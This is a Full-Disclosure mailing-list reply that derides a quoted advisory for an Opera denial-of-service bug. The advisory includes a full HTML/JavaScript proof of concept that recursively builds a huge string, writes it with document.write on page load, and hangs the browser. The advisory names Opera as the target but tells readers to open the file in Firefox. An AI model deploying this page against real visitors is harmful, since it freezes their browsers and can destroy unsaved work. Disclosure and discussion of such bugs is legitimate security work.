You gotta be joking, this is probably the 3000th DoS "advisory" for document.write.
Guess what sparky, even Jeremy Brown didn't post that one. Thus no surprise exploit-db post this kind of shit. 2010/3/3 information security <informationhacke...@gmail.com> > ====================================================================== > > Opera (plenitude String )Denial of Service Exploit > > ======================================================================= > > by > > Asheesh Kumar Mani Tripathi > > > # code by Asheesh kumar Mani Tripathi > > # email informationhacke...@gmail.com > > # company www.aksitservices.co.in > > # Credit by Asheesh Anaconda > > > #Download http://www.opera.com/download/ > > > #Background > > Opera is a popular internet browser :) > > #Vulnerability > This bug is a typical result when attacker try to write plenitude String in > document.write() function .User interaction is required to > > exploit this vulnerability in that the target must visit a malicious > web page. > > > > #Impact > Browser doesn't respond any longer to any user input, all tabs are no > longer accessible, your work if any might be lost. > > > > #Proof of concept > copy the code in text file and save as "asheesh.html" open in Mozilla Firefox > > ======================================================================================================================== > > asheesh.html > ======================================================================================================================== > > <html> > > <title>asheesh kumar mani tripathi</title> > Asheesh kumar Mani Tripathi > <head> > > <script> > > > > function asheesh () > { > var i , anaconda = "XXXX" > for(i=24;i >0 ;--i) > > { > anaconda=anaconda+anaconda; > } > > document.write(anaconda); > > asheesh(); > > } > asheesh(); > > </script> > </head> > > <body onLoad="asheesh()"></body> > > </html> > > > > ======================================================================================================================== > Why do you worry without cause? Whom do you fear without reason? Who can kill > you? > > The soul is neither born, nor does it die. > > > #If you have any questions, comments, or concerns, feel free to contact me. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
